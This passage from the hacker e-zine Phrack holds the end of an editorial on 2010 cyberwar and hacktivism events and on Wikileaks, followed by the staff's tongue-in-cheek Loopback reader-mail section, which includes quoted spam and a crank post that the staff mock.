super star hacking squads would love to take down Bushehr, Russia is 
standing in the way, defending its plan for a return on investment.

Stuxnet represents just one of a few big events in this arena since last 
issue. We've also had Aurora and that whole Google scandal in China.  
Hildawg has been bitching about China from the start, and it came as no 
surprise that pressure would be put to bear on big companies, like Google, 
to defame China's government in the midst of a GFC.  More recently, 
Europe's cyberwar simulation has been hailed as a success, with countries 
across the EU learning to defend against over 300 attacks.  This marks 
another milestone in the EU's attempt at coordinating intraregional 
cybercrime investigations.  Across the Atlantic, USCYBERCOM has finally 
gone live.  While governments prefer to keep their military hax a secret, 
there exists a necessity for them to demonstrate their power.  Welcome to 
a whole new wave of terror, hackers.

The majority of high profile attacks in the last year show a trend towards 
highly skilled and targeted hacks that take a lot of time and/or money to 
develop.  In these cases there is minimal collateral damage, months may 
pass before detection, the hackers are anonymous, and the vector is 
unique.  While these are still large-scale attacks, they're not intended 
to affect the entire internet -- just a select few major players, and 
sometimes only for a short while.  As corporations and governments throw 
big bucks into cyber warfare we're going to start to see some of the big 
names in the IT industry get left behind.

The continued DDoS of Burma, in the lead-up to its first election in over 
20 years, showed a recent and unwelcome return to stupidity and ignorance 
at a rate of 10-15gbps, easily dwarfing the Estonia DDoS of 2008.  Amnesty 
International had been working hard to get radios into Burma, so that 
people could keep up with the election news from across the border.  Days 
after the election, their Hong Kong website was compromised and visitors 
were attacked with an IE exploit that Microsoft knew about, but blatantly 
refused to patch early.

On the same day that the Burma DDoS began, the Iranian Cyber Army 
announced its "botnet for hire", though it is rather unlikely that there 
is a substantial link between the two.  Their admin system is some kind of 
honeypot, their stats are fake, and surely the very idea should have 
screamed of an obvious trap.  But as the news started to spread, bloggers 
began recycling news media, and slower reporters started relying on those 
bloggers, until we started coming across reports that ICA was renting out 
"the same botnets that took down Twitter and Baidu".  Uh, sorry?  Last 
time I checked, social engineering a dude at Register.com didn't require a 
botnet.  

But hey, maybe there is a botnet, or at least one in development.  It's 
hardly as though ICA are the first to do so.  But their treatment by news 
media is ridiculous.  I mean, if these guys really are an "army" then just 
where were they when Honker struck out in retaliation for Baidu's 
defacement earlier this year?  Unfortunately the media still clings to 
them because of a handful of high profile defacements.  And because they 
tend to pop up every time something big happens, some journalists actually 
think these kids are an officially sanctioned military force that reports 
to Ahmadinejad himself!  I don't believe, for a second, that they're even 
Iranian to begin with.

On the related note of poor-man's hacking, we're also seeing a rise in 
grassroots hacktivism.  Social networking sites are making it increasingly 
easy to inspire angry mobs of ordinary computer users to take part in a 
DDoS by clicking a link.  Years ago we laughed at those kinds of methods 
(remember the cDc's hacktivismo?).  But we're not on dialup anymore, and 
there's not a lot you need to get your own "human-net" started -- just a 
persuasive cause and a handful of idiot-proof programs.  LOIC is popular 
for this, as are websites that send GET requests in iframes over and over 
and over.  Next thing you know, there's thousands upon thousands of stupid 
tweeters, staggering forth like something out of Resident Evil.  This 
isn't even including the more normal botnets that rely on Twitter for 
commands.  Throw that into the mix and Twitter becomes some 
kind of pluralistic middle-class pseudo-political force to be reckoned 
with.  Law enforcement seem to just give up in those cases.  Too many 
people to chase.  Not enough resources to prosecute them all.  The most we 
see is the instigators of these human-nets being hunted down.  As the RIAA 
and MPAA attacks showed us, Anonymous ain't so anonymous when they plan 
their attacks in the open, in front of feds, on 4chan and Darknet.

The trend toward military-directed cyber attacks is prompting some 
academics to call for a change to the laws that regulate the conduct of 
hostilities in war.  They are questioning whether a country can remain 
neutral in a cyber war if the data carrying the attack travels along that 
country's pipelines.  Some militaries insist that for hackers to qualify 
for "prisoner of war" status, these geeks must wear a special hacker 
uniform and carry a sidearm (I like to think this uniform would look like 
TRON Guy).  

And then there's the question of whether something like Stuxnet can be a 
legal impetus for conventional war.  The real beauty of Stuxnet isn't just 
in the code (as specialised and 0-day as it may have been) -- it's also in 
the attack vector.  If you conveniently lose your malicious USB key in a 
parking lot, and some "unscrupulous person" picks it up and decides to use 
it at work... YOU are not committing an attack -- at least not directly 
(one could argue, after all, that they had no business picking up the usb 
key in the first place).  Moreover, philosophical arguments aside, if 
you're a civilian, the likelihood of you being charged with anything is 
extremely remote. Add all of this to the essential argument that hacking 
cannot be considered an act of war necessitating self-defense unless the 
hack can be compared to a substantive and conventional military attack, 
and conventional arguments are essentially thrown out the window. In other 
words, in the case of Stuxnet, while Iran recognises there was espionage, 
and possibly an intentional attack, the worm was not an "armed attack" 
sufficient to qualify self-defense under the UN Charter.

In sum, if the events occurring since the last issue have been anything to 
go by, the next decade will see a growing disparity between the nature of 
high-profile hacks, but at the end of the day the bulk of it is the same 
old same old, with some new shit thrown in.  Militaries are fast becoming 
a cyber-force to be reckoned with, but in the absence of laws to regulate 
their actions, don't expect bombs to fall as a result.  While it is most 
probable that the recent spate of uniquely targeted high-profile attacks 
will go unpunished, what we can expect is the government to play an 
increasing role in regulating the Internet and hunting down ordinary 
hackers in the name of a "war on cyber terrorism".


--[ 3. Wikileaks and Whistleblowing

But what of Wikileaks? While it is undeniable that it has had some impact, 
one must ask oneself if we are not just raucously accepting as a date to 
the prom the only girl who asked us out and considering ourselves lucky to 
have found anyone at all. One could argue that when a society needs a 
hero, someone will always be willing to show up fighting, but the same 
could be said of most movements, even including the upstart 'Tea Party' 
being cawed about on Fox News to cheers by the same people who would have 
voted for Obama if they'd been Democrats instead of Republicans. Perhaps 
it's unfair to tilt this article so specifically in the direction of the 
US -- after all, Wikileaks has shed some light on some tremendously 
important stories in the three or four years since its inception -- but 
it's hard to argue that 2010 was the year that Wikileaks came to true 
nation-wide attention, due in no small part to a certain "redacted" video 
going by the sobriquet "Collateral Damage", and then fueled by the 
document dumps ostensibly leaked by US insiders concerning Iraq and 
Afghanistan that came not long thereafter.

Yes, we have a responsibility to make information accessible, or at least 
make the knowledge of how such information is stored and used more public, 
less draconian and redolent of a country poised to curtsy/bow to 'Mein 
Fuhrer' but we also have a responsibility to treat that information with 
respect, and more importantly to be able and willing to filter that data 
through the sieve of common sense and reason: Data should be valuable 
because it is valuable data (and in some cases the releases by Wikileaks 
have indeed been valuable data) and not valuable simply by the reasoning 
that "they don't want us to have it." 

By the same token, sometimes the very act of sticking the proverbial 
middle finger up at The Man serves as a call to arms -- or at the very 
least a rate limiter: A way to urge the current Powers That Be to think a 
little more before trying to institute even further privacy eroding 
measures. Conversely, it is all too easy for any country to consider any 
"leak" -- righteously whistleblowing or not -- as an act of war, or an 
excuse to add a few zeros to a department's line budget.

And there's something else we all need to be thinking about:

Every country, every war, every movement has secrets. We may tell 
ourselves that information wants to be free, but freedom comes with a 
price and some secrets are GOOD secrets. More importantly there OUGHT to 
be some secrets in the world.

To completely submit to Wikileaks' vision is almost more akin to Big 
Brother than anything the US government -- or any other government -- 
could possibly create on its own: A culture where your every move may be 
exposed, your every thought may be tallied, your every minutiae published 
for the whole world to see, in a world where Google gambols giddily in the 
grasses of greed and Facebook and Twitter announce to the world your every 
move to a perceived audience of enthralled onlookers all willing to say 
'you!' when you say 'ah, me!'. In a way we're already most of the way 
there, and that's a very dangerous thing. When your baseline gets reset 
and you don't REALIZE that your privacy is being invaded, then the great 
big "They" has already won -- and you have just let yourself do the dirty 
work for Them.

One could argue that if PFC Manning did indeed leak what has been 
attributed to him, he may have done a heroic thing, but the fact that he 
may have also broken a trust that he covenanted into in advance with the 
US government is difficult to completely discount. The Manning case having 
received the attention it has gotten this year has brought up a lot of 
grey areas in peoples' political belief systems, but it has also begged 
the question: What *is* "whistleblowing" and what is "disloyalty"? What is 
"patriotism" and what is "narqing"? When can one trust one's judgment 
about another person's true intentions and is it truly as cut-and-dry as 
we all wish it would be? Adrian Lamo snitched, but it is always possible 
that he thought he was protecting himself or his country even as he may 
have also been trying to cobble together some newfound publicity for a 
receding career that has been inarguably past its prime for years now. At 
some level this isn't about government or whistleblowing or privacy -- 
it's about society and about interpersonal trust, and perhaps that is 
where things get the murkiest. Naive or not, trust is dealt out 
increasingly to total strangers on the internet. One could argue that 
Manning, if indeed that was Manning, was naive in trusting a veritable 
stranger, but most of us do this on a regular basis now; the difference 
here is, Manning paid.

Without an explicit agreement of nondisclosure one cannot truly and 
totally scorn somebody for "squealing", but by the same token our very 
society has been built up on such simple and implicit bonds of trust: I 
will not hurt you, I will not steal from you, I will not betray you. I may 
not agree with what you do, but I respect your choices as an individual. 
At what point does that trust need to be broken off? Some secrets are 
good, if they contribute to the greater good of society -- and that goes 
*both* ways -- at times in favour of the individual, at other times in 
favour of government. As a species we always want to root for the Underdog 
(and nowhere is this more true than the US, perhaps), but given the fast 
fluxing nature of the Internet, who the Underdog is can flip at a second's 
notice: At first Wikileaks was the cause celebre of people everywhere, 
then came the backlash. All movements have backlashes, and Wikileaks was 
bound to not be the exception.

Perhaps one reason so many scorn Wikileaks has to do with the closed-book 
nature of a site so overtly and devoutly espousing transparency; at some 
point it becomes difficult not to interpret all sides as playing with 
similar playbooks. But it's difficult to win at poker at a table where 
everybody knows your cards, especially when the rest of the players have 
bankrolls that far eclipse your own. Again, the question arises: When is 
transparency necessary, and when is secrecy a requirement to make any 
progress at all? On the one hand, one must worry about too much 
transparency; on the other hand, one must worry about too much lurking in 
the shadows. In the past we had journalists to expose corruption; now it 
is often journalists themselves fighting off corruption charges, hiding 
facts, skewing evidence.

It's incredibly difficult to deny that some transparency, and indeed 
Wikileaks itself, can have a positive impact -- and it's hard to imagine a 
world where SOME sunshine shouldn't be shed; The trick here is to remember 
that such increased levels of exposure demand we be a more responsible, 
measured animal -- something as homo sapiens we have really never learned 
how to do or be. 

There is no way to shove the genie back into the bottle, and old rumours 
on the Internet never really die -- they just get archived til someone 
else manages to come along and dig them up from their temporary graves. 
This holds great promise for the future of integrity, but it also creates 
issues when the possibility of outright falsehoods is introduced, 
especially through an anonymous third party, or in cases where a split 
exists between haves and have-nots; who really has time to monitor their 
reputation online to that level? And if someone does besmirch your name, 
what can be done?

If your data shows up on a whistleblower site care of a third party, then 
it also becomes yet another way to show a display of power: The 
Vice-Presidential hopeful breaks the rules -- nay, the law -- and walks 
free while the college student who guesses at her password gets sentenced 
to a year of supervision or prison. If there is to be light shed, then it 
should be an equally penetrating (and perhaps softer) light -- not a light 
meant to shine in the victims' faces and hide the face of the perpetrators 
-- especially when the label of 'victim' and 'perpetrator' is so murky and 
grey (as in the Palin case; one could argue both sides committed some form 
of fault).

Julian Assange likes to say 'speak truth to power' but this is a tall 
order; to first be able to speak ANYTHING to power, you must basically 
gain the ear of the powerful, or you just get thrown into an eddy, left to 
whirl around with a bunch of kooks and nutjobs (as any federal agent 
handling walk-ins will likely attest to, and too, so must whistleblowing 
sites contend with; with fame comes your own raft of nutjobs to weed out).

It'd be hard to deny that whatever else Wikileaks has accomplished in the 
past year, it has gotten someone's attention. Whether that will be a good 
thing or a bad thing remains to be seen... But one imagines any call to 
arms must bring about some force for good, even if that force is something 
as simple as a renewed spirit of vigour and willingness to be involved 
among an otherwise sluggish populace juggling its own sense of 
powerlessness in a country demanding what essentially constitutes sexual 
assault merely in order to board an airplane. To make an omelet you must 
first break some eggs; To create a change you must first gain the ear of 
not just power but the people itself -- and then you must charge them with 
the duty to act.

The true collateral damage may wind up being Manning himself, here; 
basically judged guilty already, his name forever stored, his 
acquaintances being hassled, his personal life bared open to the world, 
he serves as both an example of what to strive for and a 
cautionary tale for a new age. What the future holds for him remains to be 
seen, but with any luck he will receive a fair trial by a jury of his 
peers -- if any such people even exist.

Wikileaks may not be perfect -- in fact, it may be deeply flawed -- but 
for now it's probably all we're going to get. And we should probably be 
grateful for it -- but wary. Always wary. The danger of mixing the message 
up with the messenger is always great, and there is no real way for any 
whistleblowing site to always be 100% correct. Even governments have an 
incredible amount of difficulty verifying the veracity of any information 
or separating rumours from fact; to put this level of blind trust in a 
volunteer organization with no oversight is bound to be fraught with a 
whole host of issues we haven't seen the likes of yet... For instance, 
what happens when a non-governmental entity views it as a potential source 
of information? Once any whistleblowing site gets information, it is out 
there; what is done is done. At this point, false flags and disinformation 
are also an issue; the possibility of tricking any whistleblower site into 
publishing false information would not only destroy its credibility if 
found out but could possibly be used to forward some governmental or 
non-governmental party or agenda. Additionally, to believe everything that 
any organization says is as short-sighted as believing everything your 
government tells you.

Ultimately your conscience will have to be your guide -- and likely no two 
consciences will ever completely agree, especially about anything as 
at-times agit prop as Wikileaks can be, or as secretive as governments 
have always been.


--[ 4. Scene Events: the Final Word

To be sure, many other events have taken place this past year and a half 
(the whitehat-vs-blackhat wars forever raging (cue zf05 and the 
never-ending arguments about disclosure-vs-nondisclosure); the global 
emergence of a harsher, more organized form of cybercrime (and the many 
busts that resulted);  etc, etc), but several basic themes emerge: There 
has been fraud -- but there has always been fraud. There have been 
invasions of privacy -- but there have always been invasions of privacy. 
There have been governments overstepping their bounds -- but there have 
always been governments overstepping their bounds. That doesn't make any 
of it acceptable, but it also doesn't make any of it new -- nor does it 
give any of us an excuse to pretend it has nothing to do with us (no 
matter where you reside or what flag you fly (or choose not to fly, 
whatever the case may be)). If anything, there has been an amplification 
of all of the above, but none of it is truly 'new'. Read past issues of 
Phrack: All of the above has existed in some form or another, just on a 
smaller scale. It's still existed.

Judging by the drive for wealth or fame or infamy displayed in so many of 
this year's stories, it bears mentioning that we cannot let a few key 
players make us forget how important it is to treat technology 
responsibly, reasonably -- to love it, to hack it, to, please, take risks, 
but to do so with heart

-- with CONSCIENCE --.

In the end it all starts and ends with you.

[EOF]





--------------------------------------------------------------------------------


                              ==Phrack Inc.==

               Volume 0x0e, Issue 0x43, Phile #0x04 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


    Hi there!

As you may have noticed, the Loopback tradition had been lost for years. 
The previous staff decided to remove it as it was a little bit hum... let's
say 'teasing' ;>

Can you remember Duvel's remark on that fact?

A brief history of the Underground scene (p64):

                                    ---
Take a look at the Phrack Loopback responses during the first 10 years
to the recent ones. A much higher percentage of responses are along the
lines of `you're an idiot, we at Phrack Staff are much smarter than 
you.`...
                                    ---

Well good news folks, it's back. We chose to resuscitate it as:
    - it's fun. YES IT IS (especially considering the fact that people
      were not aware of its coming back)
    - we promise not to be too much of bitches (or so they hope) ;>
    - we want YOU to share with the Underground. As such for the next issue
      you are very welcome to send us mails of all kind
    - we are poor on philes for this issue (just kidding BTW, we're just
      elitist arrogant bastards)

We humbly apologize to all the guys we never answered, either by mail or 
through this phile, because we suck at filtering our spam (this could
_absolutely_ not be a laziness issue, right?)

Time to find out who wanted to say hello.

    -- The Phrack Staff


|--=[ 0x00 - From India ]=-----------------------------------------------=|

Subject: Re: Null Conference and Security Community
From: Prashant KV <bug@null.co.in> 
Cc: Marketing <marketing@null.co.in> 

    [ Marketing? :> ]

Hi,

    [ Hi Prashant ]

[...]

Null is a community of enthusiastic hackers and security professionals in
India. It all started with a motive to promote advanced security research
in India. 
 
Null has immensely contributed in nurturing young hackers and providing a
platform to amateurs. Over the years, the Indian industry and several
government organizations have benefited from the expertise of Null members.
Be it creating awareness among Indian developers or defending Indian 
Infrastructure, Null members are everywhere. 
 
As a part of continued efforts in creating awareness among our enthusiasts,
Null conducts an annual conference in the carnival city of Goa called 
Nullcon. Hackers, talks, workshops, party and booze invite you, 25-26th Feb
2011, Goa, India.

   [ Thanks to the Null members, we have an interesting paper on the Indian
     hacking scene. Kudos. Please have a look at their websites:

     http://null.co.in / http://nullcon.net/cfp-nullcon-dwitiya (CFP)
   ]
 
Regards
Prashant 

|--=[ 0x01 - Th1nkG33k ]=------------------------------------------------=|

Subject: Legion of Doom T
From: Ted Mosby

    [ Hi Ted. Is Barney with you? ]

Is this shirt still available? I know it's from the early 90s, but I had 
one of these and I've always wanted to get another.

(For a limited time, the original is back!)

"LEGION OF DOOM  --  INTERNET WORLD TOUR"

The front of this classic shirt displays "Legion of Doom Internet World 
Tour" as well as a sword and telephone intersecting the planet earth, 
skull-and-crossbones style. The back displays the words "Hacking for Jesus"
as well as a substantial list of "tour-stops" (Internet sites) and a quote 
from Aleister Crowley.

    [ Dammit. We didn't even know it existed. Sorry bro, no clues on this 
      one. ]


|--=[ 0x02 - Drug abuse is bad ]=----------------------------------------=|

Subject: Binary is Hacked!!!
From: killerzerosones@null.net

555555555 55 5555 55 55555555 55555555 55 55
55 555 55 55 55 55 55 55 55 55 55 55
55 5555 55 55 55 55 55 55 55 55 55 55
55 555 55 55 55 55 55 55 55 55 55 55
555555555 55 55 55 55 55555555 55555555 555555
55 555 55 55 55 55 55 55 555 55
55 5555 55 55 55 55 55 55 55 55 55
55 555 55 55 55 55 55 55 55 555 55
555555555 55 55 5555 55 55 55 5555 55
55 555555555 55 55 55555555 55555555 55 55555 55555555 55555555
55 55 55 55 55 55 55 55 55 5555 55 55 55
55 55 55 55 55 55 55 55 55 555 55 55 55
55 55 55 55 55 55 55 55 55 55 55 55 55
55 555555555 55555555 55555555 55 555 55555555 55 55
55 55 55 55 55 55 55 55 55 55 55 55 55
55 55 55 55 55 55 55 55 55 555 55 55 55
55 55 55 55 55 55 55 55 55 5555 55 55 55
55 555555555 55 55 55 55 55555555 55 55555 55555555 555555555

Binary is setup as 0's and 1's and there are quite a few encodings that 
beat binary(machine language)...
256 128 64 32 16 8 4 2 1
0 = .
1 = .5 = 2 = 1
1 0 = 5
1 1 = 5.5 = 52 = 26 = 13
1 0 0 = 50 = 25
1 0 1 = 50.5 = 502 = 251
1 1 0 = 55
1 1 1 = 55.5 = 552 = 69
1 0 0 0 = 500 = 250 = 125
1 0 0 1 = 500.5 = 5002 = 2501
1 0 1 0 = 505
1 0 1 1 = 505.5 = 5052 = 2526
1 1 0 0 = 550 = 275
1 1 0 1 = 550.5 = 5502 = 2751

When .5 is replaced with 2 keep halving number until prime without turning
number into a decimal for a faster encoding with the 0-9 numeral system. So
basically half all the numbers until the next half becomes a decimal I.e. 
being prime. This saves in space approximately 98 numerals per 100 places 
compared to machines language.

    [ Same post was found on: 
      http://mathfax.com/emraised-to-the-infinite-9craised-to-the-infinte-9
      and
      http://www.mymathforum.com/viewtopic.php?f=13&t=12988
    
      You're crazy man :> Well this gives us the hint that at least one guy 
      is reading our drug-related papers. ]


|--=[ 0x03 - Dating ]=---------------------------------------------------=|

Subject: CFP 67 and staff
From: Larry

Hello,

Is there any place where I can talk to the staff, like it used to be in the
past?

Is the old IRC still working?

    [ Unfortunately it's not. But rumor says we may be found on other IRCs.
      If you know a guy who knows a guy who knows a guy then maybe... ]

Regards.


|--=[ 0x04 - Interesting thoughts ]=-------------------------------------=|

Subject: ANTISPAM
From: Rachel Peek <rachelpeek@live.com>

    [ We sent you a mail Rachel. Having no answers, we assumed we could 
      publish it as it currently is. ]

Normally I would try to be convincing, but I'm not feeling it right now. 
The thing is, I recently wrote a sort of article on my personal opinions 
about the government. I don't really know if it's the kind of thing you're 
looking for, but I figured I would send it in anyway. Look down.

The thing with mental disorders is you never know if what you're feeling is
real. You don't know if you've made it all up in your head, if you just 
added all this stress into your life for nothing. But it feels real. As 
real as anything can, and it's scary as shit. It raises the questions: 
Which part of the brain is in charge of sanity? Or the more often times 
more prominent insanity? What causes us to say the things we say? What 
tells us to hurt the ones we hurt? What compels us to take the actions we 
take? WHY DO WE DO THE THINGS WE DO? This question has yet to be answered 
after all of these years. I think it's because we're too busy telling each 
other what to do, and now our heads are lost up the parts of our asses 
where maps aren't allowed. I am living proof of this stupidity. I don't 
know where my thoughts come from. I just know they're there and continue to
taunt me with their daily attendance. They will cause me to do things that 
will make others wonder. They will ask the inevitable question "Why?" I've 
just stopped answering. This is because my answer will never be good 
enough. I never seem to have the appropriate reasoning for my actions. For 
lack of a few better words, I just do shit. I do what I want. In today's 
society, this is a crime. In order to become a model citizen of the proud
U.S.A., you must never, ever do what you want to do. You are to do what you
are told and ask no questions. Not that it matters. You'll only be answered
with bullshit about how it will benefit you in the end. Take your 
modern-day education program for example. They provide you with a selection
of subjects to choose from, all of which have been watered down by the 
government to shield our innocent eyes from our country's mistakes and the 
fact that the world is a shitty place thanks to our existence. This is not 
easily done though, so they must distract us with ridiculous 
extracurricular activities that will be of no use to us ever in our lives. 
And they know it. So while we're busy learning how not to break an 
unfertilized chicken ova with a Sharpie face, they're watching us. They ask
themselves,

"How will they react to this?" 

"What will happen if we do that?"

They're searching for glitches, just like you would on a computer. You make
one wrong move, you take the tiniest step out of line, and they'll 
immediately make an attempt to "correct" it. How dare you be your own 
person? How dare you make your own decisions? You must fit the mold, and if
you don't, you better believe they're trying their damnedest to shove you 
into it. They want to catch us early you see. Before we realize how to 
think for ourselves. They tell us how to walk, stand, eat, sit, write, 
sing, THINK. And we eat the shit up. Why is this? Because if we don't, we 
are shunned. We are not like the others. We are alone. The "Man" depends on
our loneliness. The homosapien hates to be alone, and they are aware of 
this. Most people will do anything to avoid it, including shutting off 
their brains to fit in. So you fall in line and you follow these rules. You
might ask why they are there at all, but you will never be answered. You 
will simply be given an ultimatum. "To get a good job and be successful" 
Another way to put this would be, "Do exactly what you're ordered to or 
have a miserable life" But success is relevant...to some at least. 
Society's definition of success is money. You go to school to get a job to 
make money to spend money to run out and need it again. You get trapped in 
the cycle. Well what if your definition of success is happiness? You've 
most likely thought to yourself, "Oh shit" This is due to the fact that you
now know you are living in a world you don't belong in. You are living in a
world where happiness IS money, and no one will believe otherwise. And so 
you need money to get by. You have to delicately touch the filthy stuff. 
You have to carry it tenderly in your pocket, making sure it's in a safe 
place, meeting all of its needs, caring for this shit with wasted love. 
And you get a job to acquire more. You get up every morning and you follow 
the speed limit up the road, and you buy your coffee that is made from 
beans picked by people who can't afford to taste it, and you walk into a 
building with big, clean windows and detailed columns cleverly placed to 
disguise the boredom that awaits you inside. You will sit. And you will 
sit. You will sit all day long in one of those swivel chairs that allow you
to do your pointless work at a slightly quicker pace by cutting out all of 
that rigorous head turning. You do this because you want to get out of 
there as soon as possible. You want to go home and eat your feelings. You 
want to stare at that black box as it tells you you are ugly. You are 
stupid. You are fat. You are not good enough. You are not the best. Be the 
fucking best. But you can't be. You never will be. You don't have time. 
You're so busy following that same goddamn schedule every day you don't 
have a single second to breathe and it's cutting the circulation off to 
your brain. You can only think what you've been taught to think and you'll
do so until you're on your deathbed trying to reflect on the life you led. 
Trying to remember something beautiful the way they do in the movies. But 
all you see are white button-downs and digital clock numbers, glowing 
computer screens and stock numbers. You have wasted your life and you might
as well be a cardboard cut-out of yourself. It's a sad thing to die a human
being.

    [ Thanks for this Rachel. ]

|--=[ 0x05 - Translation proposal ]=-------------------------------------=|

Subject: Translation of phrack magazine 
From: Robert Langdon <langdonmail@gmail.com>

    [ Audrey Tautou <3 ]

Hi Phrack staff,

I'm an Italian university student of Computer Science. I have read many 
articles of your magazine and I'm very interested in it.

These days, I have been wondering whether it is possible to translate your 
articles (not all obviously) into Italian ... and I don't understand what 
the distribution or publishing license of your articles is. The intent is 
to spread your knowledge to Italian guys. Can I translate one or more 
articles? Obviously, the translation is one-to-one, with the same 
references, the same authors and so on.

    [ As stated many times we do not officially support translations of 
      Phrack and that would be essentially because translations (even from 
      talented people) are not accurate enough. However, you're free to 
      translate any article. Good luck :) ]

Thanks for your great work.
SuperMrPlusPlus

    [ I'm confused. I thought you were Robert Langdon. ]


|--=[ 0x06 - Alcohol abuse ]=--------------------------------------------=|

From: Anonymous <nobody@remailer.paranoici.org> 
Subject: The risks of alcohol and being drunken bastards

Drinking Alcohol and Cancer Risk
www2.potsdam.edu/hansondj/HealthIssues/1109728149.html  

Alcohol - The Risks | Health | BBC World Service
www.bbc.co.uk/worldservice/sci_tech/features/health/healthyliving/
alcoholrisk.shtml 

Alcohol - Risks 
www.pamf.org/teen/risk/alcohol/risks.html   

4.5 The risks of alcohol
www.drugtext.org/library/books/raterisks/4.5.htm

Effects & risks of alcohol - Schoolies Week 
schoolies.youthcentral.vic.gov.au/Safe+Partying/Alcohol/Effects+&+risks+of+
alcohol/ 

Underage Drinking-Why Do Adolescents Drink, What Are the Risks ...  
pubs.niaaa.nih.gov/publications/aa67/aa67.htm   

Young people and alcohol - what are the risks? : Directgov - Parents
www.direct.gov.uk/en/Parents/Yourchildshealthandsafety/
Youngpeopleandalcohol/DG_183848  

Drinking and alcohol - Live Well - NHS Choices  
www.nhs.uk/Livewell/alcohol/Pages/Alcoholhome.aspx  

 Alcohol and depression: What are the risks? - MayoClinic.com   
www.mayoclinic.com/health/alcohol-and-depression/MY01078

Health risks associated with alcohol and heavy drinking 
www.drinking.nhs.uk/health-risk/

The Risks of Developing a Drug or Alcohol Dependency
www.egetgoing.com/drug_addiction/addiction_risk.asp 

Alcohol - Alcohol   
www.alcohol.gov.au/ 

Alcohol Health Risks - Alcohol & Other Drugs, The Wellness Center ...   
www.uncg.edu/shs/wellness/aod/alcoholhealth/

Teenage binge drinking, effects of alcohol, facts about alcohol at ...  
ncadi.samhsa.gov/govpubs/ph323/ 

Health Risks of Alcohol and Drug Abuse  
alcoholism.about.com/od/effect/u/Risks.htm  

Health Risks In Alcohol Abuse   
ezinearticles.com/?Health-Risks-In-Alcohol-Abuse&id=301753  

For Teens: Know the Risks of Alcohol | HealthSheets | Wellness ...  
www.mountnittany.org/wellness-library/healthsheets/documents?ID=3684

Alcohol and Breast Cancer Risk: New Findings - National Cancer ...  
www.cancer.gov/cancertopics/causes/breast/alcoholuse0408

Effects of Drinking Alcohol: Health Benefits vs. Risks  
www.webmd.com/cancer/features/faq-alcohol-and-your-health   

Drinking alcohol - Consumer Reports Health 
www.consumerreports.org/health/conditions-and-treatments/
the-risks-and-benefits-of-drinking-alcohol/overview/index.htm  

----

Getting drunken doesnt pown it is a fault of your own^^ 
Peace Phrack! 

    [ Fair enough ;> ]


|--=[ 0x07 - Insane delay ]=---------------------------------------------=|

Subject: a question                        <-- Needs ANTISPAM in Subject!
From: XXXXXXXXXXX
To: kleene@phrack.org, pwned@phrack.org    <-- Wrong address man!

Hi,
What's the real sake of this delay, working on scada systems to attack 
iran?

    [ AHAH. Stuxnet developers if you ever read that, do not forget to 
      submit a paper on SCADA hacking for p68. ]


|--=[ 0x08 - Friendly messages ]=----------------------------------------=|

From: Cristi T.
Subject: hey

hey phrack, 

    [ Hi. ]

don't die.. i hope u will deliver this issue.   

    [ Actually we're not dead. If we were then who would be writing this? 
      ;) ]

Best wishes,
Cristi

    [ Thx Cristi :) ]

                                    ---

From: ZZZ
Subject:

Hi, 

I noticed that you guys have a lot of followers who are neophytes to 
hacking. If you would like an article or two on the very basics of 
footprinting, scanning, enumeration, or hacking I might be able to do some  
for you guys. I am an IT professional and educator. At least if my content 
is for newbies, it will be well written. Just let me know.   

    [ Hi. Sorry man. Wrong e-zine, consider asking Uninformed instead ;> ]

ZZZ
AKA W88ExitUS   

Sent from my iPhone 

    [ When did the times change that much? :( ]

                                    ---

From: Christophe X
Subject: WTH ???

Hi guys,

I'm dying hoping to see the next number of phrack ... when would be the 67 
birth. Seriously, i don't think i have the skill for proposing sexy 
materials, but i'm serious enough for proposing you help for collecting / 
guiding authors. Let me know if you need help for rereading articles. I'm a
French Linux trainer, phrack was always my best emag, can't support to wait
for an annual release.

Best regards.

    [ You're always welcome to motivate potential writers. That itself is
      really helping. Thx. ]

                                    ---

From: rawhazard
Subject: ...bout issue #67

Hey men, just writing to know...what bout the issue #67? waiting for that 
since lots of time, u goin to "push the beast out"? or you won't no more? 
Lemme know, thanks  
gw

    [ Well as you can see, we did. ]

                                    ---

From: f6174179c90c0366@gmx.com  
Subject: ANTISPAM

Thank you for maintaining phrack.

    [ You're very welcome bro. ]

|--=[ 0x09 - Busted??? ]=------------------------------------------------=|

From: "Robert S. Mueller" <crimecenter@fbi.gov>
Subject: Federal Bureau Of Investigation./Anti-Terrorist And Monitory Crime
Division.   

    [ Wait. How did you find us? ] 

Federal Bureau of Investigation (FBI)   
Anti-Terrorist And Monitory Crime Division. 
Federal Bureau Of Investigation.
J.Edgar.Hoover Building Washington Dc   
Customers Service Hours / Monday To Saturday
Office Hours Monday To Saturday:

Dear Beneficiary,   

Series of meetings have been held over the past 7 months with the secretary
general of the United Nations Organization. This ended 3 days ago. It is 
obvious that you have not received your fund which is to the tune of 
$850,000.00 due to past corrupt Governmental Officials who almost held the 
fund to themselves for their selfish reason and some individuals who have 
taken advantage of your fund all in an attempt to swindle your fund which 
has led to so many losses from your end and unnecessary delay in the 
receipt of your fund.

[ ... ]

    [ Oh that's nice. With that much money, we'll be able to pay for the 
      hosting & the DNS for centuries ;) ] 

|--=[ 0x0A - Book propositions ]=----------------------------------------=|

Subject: ANTISPAM
From: scott

Hello, I have a proposition today.  

My request is to be listed under S2D316 as an author on your website: 
http://www.phrack.org/authors.html, with the explicit purpose of writing a 
novel. I will of course be mining my fellow authors' data, and thus would 
of course need their approval.   

    [ Hum. LOL ]

I will be writing a minimum two thousand pages, divided amongst seven 
chapters. 

    [ Two thousand is not enough. Consider asking us back with at least the
      double. ]

I will of course be releasing it under HTML format, and would like the 
ability to FTP my pages as I deem them worthy.   

    [ Of course. I'm afraid the sys admin is currently on holidays. He will
      not be able to setup the FTP :( ]

If the above terms are met, proceeds will be negotiated.

    [ I'm sorry. Who are you again? ]

The name of the story is:   


The Underground Myth
by
Scott X

    [ We already have an article with that name. I'm afraid we'll have to
      sue you. Our lawyer will contact you soon enough. ]


|--=[ 0x0B - Newbies ]=--------------------------------------------------=|

    [ Information was removed to protect the innocent :> ]

Subject: Neophyte's Guide   
From: NICKNAME

My mentor (X of #Y on freenode) had decided to write a
version 2 to his original Z Guide to the Underground. This   
guide lays out the framework for any neophytes looking to get into our  
world. It also lays out the truth about white hats, black hats, 
and grey hats. As well as giving the basics for anyone truly   
dedicated to learning.

    [ The truth? Sounds interesting :-P ]

I was inspired to write it after reading the article in phrack issue
